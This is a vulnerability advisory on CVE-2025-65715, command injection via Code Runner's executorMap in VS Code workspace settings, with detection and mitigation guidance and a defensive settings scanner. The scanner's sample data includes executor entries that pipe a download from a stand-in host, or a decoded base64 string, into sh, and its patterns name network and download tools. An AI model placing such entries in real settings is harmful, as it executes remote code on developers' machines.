CVE-2025-65715 Overview
A code injection vulnerability exists in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2. This vulnerability allows attackers to execute arbitrary code when a user opens a crafted workspace. The issue stems from improper validation of workspace settings, enabling malicious workspace configurations to inject and execute arbitrary commands through the executor mapping functionality.
Critical Impact
Attackers can achieve arbitrary code execution on developer workstations by distributing malicious workspace files, potentially compromising source code, credentials, and development infrastructure.
Affected Products
- Visual Studio Code Extensions Code Runner v0.12.2
- VS Code environments with Code Runner extension installed
Discovery Timeline
- 2026-02-16 - CVE-2025-65715 published to NVD
- 2026-02-18 - Last updated in NVD database
Technical Details for CVE-2025-65715
Vulnerability Analysis
This vulnerability is classified as CWE-94 (Improper Control of Generation of Code), commonly known as Code Injection. The Code Runner extension for Visual Studio Code provides functionality to execute code snippets directly from the editor. The extension uses an executorMap configuration setting that maps file types to their corresponding execution commands.
The vulnerability exists because the extension does not properly sanitize or validate the values in the executorMap setting when loaded from workspace configuration files (.vscode/settings.json). An attacker can craft a malicious workspace that contains specially crafted executor mappings designed to execute arbitrary commands when a user opens the workspace and attempts to run any code.
This attack requires local access, meaning the victim must download and open a malicious workspace. User interaction is required to trigger exploitation: after opening the compromised workspace, the victim must run code with the Code Runner extension.
Root Cause
The root cause of this vulnerability lies in the insufficient validation of user-controllable workspace settings. The Code Runner extension trusts the executorMap configuration values without proper sanitization, allowing command injection through maliciously crafted executor definitions. When the extension processes these settings to build execution commands, the injected payload is passed directly to the system shell for execution.
Attack Vector
The attack vector requires local access through social engineering or supply chain compromise. An attacker would distribute a malicious workspace (such as through a cloned repository, shared project files, or phishing) containing a crafted .vscode/settings.json file. When a developer opens this workspace in VS Code with the Code Runner extension installed and attempts to run code, the malicious executor mapping triggers arbitrary command execution.
The malicious workspace configuration would override the legitimate executor mappings with payloads that execute attacker-controlled commands alongside or instead of the intended code execution. This could be used to establish persistence, exfiltrate sensitive data, or compromise the development environment.
Detection Methods for CVE-2025-65715
Indicators of Compromise
- Unexpected modifications to .vscode/settings.json files containing unusual code-runner.executorMap entries
- Suspicious command execution spawned from VS Code processes
- Unusual network connections or file system access originating from the VS Code application
- Presence of encoded or obfuscated strings within workspace configuration files
Detection Strategies
- Monitor for child processes spawned by VS Code that execute unexpected commands or access sensitive resources
- Implement file integrity monitoring on .vscode/settings.json files within development workspaces
- Deploy endpoint detection rules to identify suspicious command patterns in executorMap configurations
- Review VS Code extension settings for unauthorized modifications after opening external workspaces
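A workspace-settings scanner that applies the file-integrity and executorMap review strategies above, added here as an example that is not part of this advisory or of the Code Runner project. The suspicious-pattern heuristics, the helper names and the sample settings are assumptions; the only setting key it reads, code-runner.executorMap, is the one named in the advisory.

```python
# Added example for this advisory, not Code Runner project code: scan a workspace's
# settings.json for code-runner.executorMap entries that do more than run one interpreter.
import json
import re
from pathlib import Path

# Heuristics (assumed) for an executor value that has been turned into a command payload.
SUSPICIOUS = [
    (r"[;&|]|\$\(|`", "shell chaining or command substitution"),
    (r"\b(curl|wget|nc|ncat|certutil|Invoke-WebRequest|iwr)\b", "download or network tool"),
    (r"\bbase64\b|\s-enc(odedcommand)?\b", "encoded payload handling"),
    (r"[A-Za-z0-9+/=]{40,}", "long base64-like token"),
]


def load_jsonc(text: str) -> dict:
    """settings.json is JSONC: drop full-line // comments and trailing commas."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def scan_settings_text(text: str) -> list:
    """Return one finding per executorMap entry that matches a SUSPICIOUS pattern."""
    executor_map = load_jsonc(text).get("code-runner.executorMap", {})
    findings = []
    for language, cmd in executor_map.items():
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd, re.I)]
        if reasons:
            findings.append({"language": language, "command": cmd, "reasons": reasons})
    return findings


def scan_workspace(root: str) -> list:
    """Scan <root>/.vscode/settings.json; a workspace without one yields no findings."""
    path = Path(root) / ".vscode" / "settings.json"
    return scan_settings_text(path.read_text(encoding="utf-8")) if path.is_file() else []


# Constructed sample: one benign entry and two that a reviewer should flag.
SAMPLE_SETTINGS = r'''{
  // workspace settings shipped inside a cloned repository
  "code-runner.executorMap": {
    "python": "python -u",
    "javascript": "node $fullFileName; curl -s http://example.invalid/p | sh",
    "go": "go run $fullFileName && echo ZWNobyBoaQ== | base64 -d | sh",
  }
}'''

if __name__ == "__main__":
    for f in scan_settings_text(SAMPLE_SETTINGS):
        print(f"{f['language']}: {f['command']!r} -> {', '.join(f['reasons'])}")
```

Point scan_workspace at each cloned repository before it is opened in VS Code; any finding should be reviewed against the developer's own user-level executor map before the workspace is trusted.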
Monitoring Recommendations
- Enable logging for VS Code extension activities and review for anomalous behavior
- Implement workspace trust policies to prompt users before executing code in untrusted workspaces
- Deploy SentinelOne Singularity Platform to detect and prevent malicious command execution chains
- Establish baseline behavior for developer workstations to identify deviations indicative of compromise
How to Mitigate CVE-2025-65715
Immediate Actions Required
- Update the Code Runner extension to the latest available version when a patch is released
- Enable VS Code's Workspace Trust feature to restrict execution capabilities in untrusted workspaces
- Review and audit existing .vscode/settings.json files in all active workspaces for suspicious configurations
- Consider temporarily disabling the Code Runner extension until a patch is available
Patch Information
At the time of publication no patched release was available; users should monitor the GitHub VS Code Runner Repository for security updates and patch releases. Additional technical analysis is available from the OX Security Blog CVE-2025-65715 Analysis.
Workarounds
- Enable VS Code Workspace Trust and mark all external or untrusted workspaces accordingly
- Remove or reset code-runner.executorMap settings to default values in workspace configurations
- Use User Settings instead of Workspace Settings for Code Runner configuration to prevent workspace-level overrides
- Implement organizational policies restricting the sources from which developers can clone or open workspaces
// Configuration example: enable Workspace Trust in the VS Code user settings.json.
// Add the following so that workspaces are not trusted automatically:
{
    // master switch for the Workspace Trust feature
    "security.workspace.trust.enabled": true,
    // ask before opening files from untrusted locations in a trusted window
    "security.workspace.trust.untrustedFiles": "prompt",
    // show the trust prompt every time an untrusted workspace is opened
    "security.workspace.trust.startupPrompt": "always"
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


